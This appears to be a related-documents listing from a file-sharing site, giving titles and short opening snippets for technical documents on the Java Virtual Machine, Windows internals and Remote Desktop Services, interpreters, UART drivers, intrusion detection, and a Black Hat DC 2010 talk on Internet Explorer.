1 The Java Virtual Machine
1 The Java Virtual Machine About the Spec Format This document describes the Java virtual machine and the instruction set. In this introduction, each component of the machine is briefly described. This
Application Compatibility Best Practices for Remote Desktop Services
Application Compatibility Best Practices for Remote Desktop Services Introduction Remote Desktop Services in Windows Server 2008 R2 allows Windows Server to be accessed by multiple users concurrently to
Windows8 Internals, Sixth Edition, Part 1
Microsoft Windows8 Internals, Sixth Edition, Part 1 Mark Russinovich David A. Solomon Alex lonescu Windows Internals, Sixth Edition, Part i Introduction xvii Chapter 1 Concepts and Tools 1 Windows Operating
Interpreters and virtual machines. Interpreters. Interpreters. Why interpreters? Tree-based interpreters. Text-based interpreters
Interpreters and virtual machines Michel Schinz 2007 03 23 Interpreters Interpreters Why interpreters? An interpreter is a program that executes another program, represented as some kind of data-structure.
Intrusion Detection via Static Analysis
Intrusion Detection via Static Analysis IEEE Symposium on Security & Privacy 01 David Wagner Drew Dean Presented by Yongjian Hu Outline Introduction Motivation Models Trivial model Callgraph model Abstract
Windows & Linux API interface code for PCI/PCIe UARTs drivers
Windows & Linux API interface code for PCI/PCIe UARTs drivers 1.0 INTRODUCTION PCI and PCIe UARTs will work with standard serial COM ports APIs. However, for advanced features such as Auto RS-485 Half-duplex
Internet Explorer turns your personal computer into a publicfile Server
Internet Explorer turns your personal computer into a publicfile Server Black Hat DC 2010 Jorge Luis Alvarez Medina 1 Jorge Luis Alvarez Medina CORE Security Technologies February 2010 Outline Attack results
